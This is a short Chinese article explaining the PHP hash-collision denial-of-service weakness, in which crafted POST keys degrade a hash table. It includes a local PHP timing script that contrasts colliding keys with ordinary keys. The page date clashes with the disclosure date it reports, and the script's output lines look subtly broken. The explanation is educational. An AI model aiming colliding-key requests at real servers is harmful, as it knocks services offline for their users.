日期:2011-11-11  浏览次数:20511 次

  最近(貌似是28号)从国外(地址:http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html)爆出了一个关于Array的新PHP冲突,可以利用调用hash表的冲突对服务器进行拒绝服务攻击。

  原理:目前很多语言, 使用hash来存储key – value数据,包括常用的来自用户的POST数据,攻击者可以通过构造请求头,并伴随POST大量的特殊的”key”值(根据每个语言的Hash算法不同而定制),使得语言底层保存POST数据的Hash表因为”冲突”(碰撞)而退化成链表。

 

  这样一来,如果数据量足够大, 那么就可以使得语言在计算,查找,插入的时候, 造成大量的CPU占用,从而实现拒绝服务攻击。

 

  <?php

  $size = pow(2, 16);

  $startTime = microtime(true);

  $array = array();

  for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {

  $array[$key] = 0;

  }

  $endTime = microtime(true);

  echo '插入 ' . $size . ' 个恶意的元素需要 ' . $endTime - $startTime . ' 秒' . "\n";

  $startTime = microtime(true);

  $array = array();

  for ($key = 0, $maxKey = $size - 1; $key <= $maxKey; ++$key) {

  $array[$key] = 0;

  }

  $endTime = microtime(true);

  echo '插入 ' . $size . ' 个普通元素需要 ' . $endTime - $startTime . ' 秒' . "\n";

  /**

  * 结果

  *

  * 插入 65536 个恶意的元素需要 36.357950925827 秒

  * 插入 65536 个普通元素需要 0.029613018035889 秒

  */